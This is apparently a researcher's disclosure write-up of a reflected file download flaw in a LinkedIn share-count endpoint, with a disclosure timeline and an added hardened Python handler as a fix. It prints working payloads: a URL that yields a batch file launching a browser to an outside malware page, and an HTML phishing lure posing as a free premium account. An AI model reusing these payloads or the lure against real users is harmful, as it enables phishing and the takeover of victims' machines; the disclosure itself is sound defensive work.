While researching another website I discovered an XHR request in the Google Chrome inspector to Linkedin that seemed interesting:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
Basically it was the request websites make to count how many shares their site has on the Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:
https://www.linkedin.com/countserv/count/share?url="||calc||
Which returned:
IN.Tags.Share.handleCount({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"\"||calc||"});
The url parameter wasn't validated and was reflected into the JSON response.
If I downloaded the file and renamed it to .bat, it executed the Windows calculator.
But this was not enough: I needed to change the path so that the browser downloads a batch file, and to use a different Windows command.
https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||
Guess what? IE8 automatically downloaded this batch file from a trusted domain: linkedin.com
I wanted this to work with other browsers too, so I needed the HTML5 download attribute.
[code language="html"]
<div align="center">
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a>
<h1>Linkedin Premium account!</h1>
<p><i>(Use "Save link as" to download the file)</i></p>
</div>
[/code]
So a possible attack scenario would be:
1. A malicious user sends the link to the victim, as they would with a CSRF or an XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
2. The victim clicks the link and, trusting where it came from (Linkedin), downloads the file
3. The victim runs the file and their computer is hijacked
A malicious user could even lend more credibility to the HTML5 download page by using well-known open redirect vulnerabilities on trusted sites, such as open redirects on Google or even on Linkedin.
To the victim, the entire process looks like a file being offered for download from Linkedin's own site, and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer and launch malicious files that appear to originate from a trusted party.
Malicious users are always searching for better ways to gain the trust of victims. This could be the right online weapon.
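The fix on the server side is to stop every link in the chain above: refuse path-parameter suffixes such as ";setup.bat" that let the attacker choose the filename, validate the url parameter before reflecting it, and pin the response to a fixed, harmless filename. The following is an added example of such a hardened JSONP handler, not Linkedin's code; the endpoint path, callback name and response filename are assumptions that mirror what the post shows.

```python
import json
import re
from typing import Optional, Tuple, Dict
from urllib.parse import urlsplit

# Assumed endpoint path and callback, modelled on the post (hypothetical).
SHARE_COUNT_PATH = "/countserv/count/share"
CALLBACK = "IN.Tags.Share.handleCount"

# Only plain http(s) URLs: no quotes, pipes or whitespace, which are exactly
# the characters the post's payload needed for cmd.exe to run "calc".
_SAFE_URL = re.compile(
    r"^https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[A-Za-z0-9._~%/?=&#+-]*)?$"
)


def validate_share_url(url: str) -> Optional[str]:
    """Return the url unchanged if it is safe to reflect, otherwise None."""
    if not _SAFE_URL.fullmatch(url):
        return None
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return url


def build_share_count_response(request_path: str, url: str,
                               count: int = 0) -> Tuple[int, Dict[str, str], str]:
    """Build (status, headers, body) for the share-count JSONP endpoint.

    RFD hardening: (1) the path must match the endpoint exactly, so a
    ';setup.bat' suffix cannot name the downloaded file; (2) the url
    parameter is validated before it is reflected; (3) a fixed filename in
    Content-Disposition plus nosniff means that even a "Save link as" yields
    a .json file rather than something the OS will execute.
    """
    if request_path != SHARE_COUNT_PATH:
        return 404, {"Content-Type": "text/plain"}, "not found"
    safe_url = validate_share_url(url)
    if safe_url is None:
        return 400, {"Content-Type": "application/json"}, json.dumps({"error": "invalid url"})
    payload = {"count": count, "fCnt": str(count),
               "fCntPlusOne": str(count + 1), "url": safe_url}
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "Content-Disposition": 'inline; filename="share-count.json"',
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, f"{CALLBACK}({json.dumps(payload)});"
```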
Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 Linkedin didn't understand the true nature of the attack
11-05-2015 I replied with more information, citing other public RFD attacks and Oren Hafif's paper on RFD
13-05-2015 Linkedin told me that they were working on a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they would give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fixed the issue
18-09-2015 Full disclosure